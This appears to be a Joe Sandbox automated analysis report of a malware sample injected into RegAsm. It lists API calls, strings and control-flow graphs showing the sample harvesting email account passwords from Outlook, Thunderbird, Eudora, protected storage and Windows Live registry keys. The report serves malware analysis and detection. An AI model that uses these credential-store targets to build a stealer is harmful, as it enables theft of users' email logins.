                                                                                                                                                                                • API String ID: 4271163124-1506664499
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@DeleteObject
                                                                                                                                                                                • String ID: r!A
                                                                                                                                                                                • API String ID: 1103273653-628097481
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                • String ID: _lng.ini
                                                                                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                • free.MSVCRT ref: 0040A908
                                                                                                                                                                                • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 726966127-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                • free.MSVCRT ref: 0040B201
                                                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                • free.MSVCRT ref: 0040B224
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 726966127-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 231171946-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3669619086-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                • free.MSVCRT ref: 00417425
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2605342592-0
                                                                                                                                                                                • Opcode ID: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                                                                                                                                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                • Opcode Fuzzy Hash: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                                                                                                                                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1961120804-0
                                                                                                                                                                                • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:3%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:21.8%
                                                                                                                                                                                Signature Coverage:0.4%
                                                                                                                                                                                Total number of Nodes:925
                                                                                                                                                                                Total number of Limit Nodes:15
44b405 33238->33237 33239 44b435 VirtualProtect 33238->33239 33239->33237 33240 44b444 VirtualProtect 33239->33240 33240->33237 33242 44b413 33241->33242 33247 44b454 33242->33247 33248 44b42b 33242->33248 33244 44b41c 33245 44b435 VirtualProtect 33244->33245 33244->33247 33246 44b444 VirtualProtect 33245->33246 33245->33247 33246->33247 33249 44b431 33248->33249 33250 44b435 VirtualProtect 33249->33250 33251 44b454 33249->33251 33250->33251 33252 44b444 VirtualProtect 33250->33252 33252->33251 34560 43ffc8 18 API calls 34374 4281cc 15 API calls __fprintf_l 34562 4383cc 110 API calls __fprintf_l 34375 4275d3 41 API calls 34563 4153d3 22 API calls __fprintf_l 34376 444dd7 _XcptFilter 34568 4013de 15 API calls 34570 425115 111 API calls __fprintf_l 34571 43f7db 18 API calls 34574 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34378 4335ee 16 API calls __fprintf_l 34576 429fef 11 API calls 34379 444deb _exit _c_exit 34577 40bbf0 138 API calls 34382 425115 79 API calls __fprintf_l 34581 437ffa 22 API calls 34386 4021ff 14 API calls 34387 43f5fc 149 API calls 34582 40e381 9 API calls 34389 405983 40 API calls 34390 42b186 27 API calls __fprintf_l 34391 427d86 76 API calls 34392 403585 20 API calls 34394 42e58e 18 API calls __fprintf_l 34397 425115 75 API calls __fprintf_l 34399 401592 8 API calls 33225 410b92 33228 410a6b 33225->33228 33227 410bb2 33229 410a77 33228->33229 33230 410a89 GetPrivateProfileIntA 33228->33230 33233 410983 memset _itoa WritePrivateProfileStringA 33229->33233 33230->33227 33232 410a84 33232->33227 33233->33232 34586 434395 16 API calls 34401 441d9c memcmp 34588 43f79b 119 API calls 34402 40c599 32 API calls 34589 426741 87 API calls 34406 4401a6 21 API calls 34408 426da6 memcpy memset memset memcpy 34409 4335a5 15 API calls 34411 4299ab memset memset memcpy memset memset 34412 40b1ab 8 API calls 34594 425115 76 API calls __fprintf_l 34598 4113b2 18 API calls 2 library calls 34602 40a3b8 memset sprintf SendMessageA 33253 410bbc 33256 
4109cf 33253->33256 33257 4109dc 33256->33257 33258 410a23 memset GetPrivateProfileStringA 33257->33258 33259 4109ea memset 33257->33259 33264 407646 strlen 33258->33264 33269 4075cd sprintf memcpy 33259->33269 33262 410a0c WritePrivateProfileStringA 33263 410a65 33262->33263 33265 40765a 33264->33265 33266 40765c 33264->33266 33265->33263 33268 4076a3 33266->33268 33270 40737c strtoul 33266->33270 33268->33263 33269->33262 33270->33266 34414 40b5bf memset memset _mbsicmp

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                • memset.MSVCRT ref: 00408343
                                                                                                                                                                                • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                • memset.MSVCRT ref: 00408376
                                                                                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                • API String ID: 1832431107-3760989150
                                                                                                                                                                                • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                                • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                                • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                                • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                • String ID: ACD
                                                                                                                                                                                • API String ID: 379999529-620537770
                                                                                                                                                                                • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                                • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                  • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                                                                                                • memset.MSVCRT ref: 00402003
                                                                                                                                                                                • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                • memset.MSVCRT ref: 00402086
                                                                                                                                                                                • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                • memset.MSVCRT ref: 00402018
                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileFolderPathSpecialStrings_mbscatatoisprintf
                                                                                                                                                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                • API String ID: 52128907-4223776976
                                                                                                                                                                                • Opcode ID: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                • Opcode Fuzzy Hash: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00402869
                                                                                                                                                                                  • Part of subcall function 004029A2: RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,770145ED,?,00000000), ref: 004028A3
                                                                                                                                                                                  • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,770145ED,?,00000000), ref: 0040297B
                                                                                                                                                                                  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                • API String ID: 1497257669-167382505
                                                                                                                                                                                • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                                • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$??3@DeleteFreeLoadMessageObject
                                                                                                                                                                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                • LoadLibraryA.KERNEL32(pstorec.dll), ref: 00403C35
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                Strings
                                                                                                                                                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$FreeLoad_mbscpy
                                                                                                                                                                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 262 444c4a-444c66 call 444e38 GetModuleHandleA 265 444c87-444c8a 262->265 266 444c68-444c73 262->266 268 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 265->268 266->265 267 444c75-444c7e 266->267 269 444c80-444c85 267->269 270 444c9f-444ca3 267->270 277 444d02-444d0d __setusermatherr 268->277 278 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 268->278 269->265 272 444c8c-444c93 269->272 270->265 273 444ca5-444ca7 270->273 272->265 275 444c95-444c9d 272->275 276 444cad-444cb0 273->276 275->276 276->268 277->278 281 444da4-444da7 278->281 282 444d6a-444d72 278->282 285 444d81-444d85 281->285 286 444da9-444dad 281->286 283 444d74-444d76 282->283 284 444d78-444d7b 282->284 283->282 283->284 284->285 287 444d7d-444d7e 284->287 288 444d87-444d89 285->288 289 444d8b-444d9c GetStartupInfoA 285->289 286->281 287->285 288->287 288->289 290 444d9e-444da2 289->290 291 444daf-444db1 289->291 292 444db2-444dc6 GetModuleHandleA call 40cf44 290->292 291->292 295 444dcf-444e0f _cexit call 444e71 292->295 296 444dc8-444dc9 exit 292->296 296->295
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                • String ID: 2t

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 300 40fb00-40fb35 call 44b090 RegOpenKeyExA 303 40fc37-40fc3d 300->303 304 40fb3b-40fb4f 300->304 306 40fb55-40fb7e RegQueryValueExA 304->306 307 40fc2d-40fc31 RegCloseKey 304->307 308 40fc23-40fc27 RegCloseKey 306->308 309 40fb84-40fb93 call 404734 306->309 307->303 308->307 309->308 312 40fb99-40fbd1 call 4047a5 309->312 312->308 315 40fbd3-40fbdb 312->315 316 40fc19-40fc1d LocalFree 315->316 317 40fbdd-40fc14 memcpy * 2 call 40f802 315->317 316->308 317->316
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
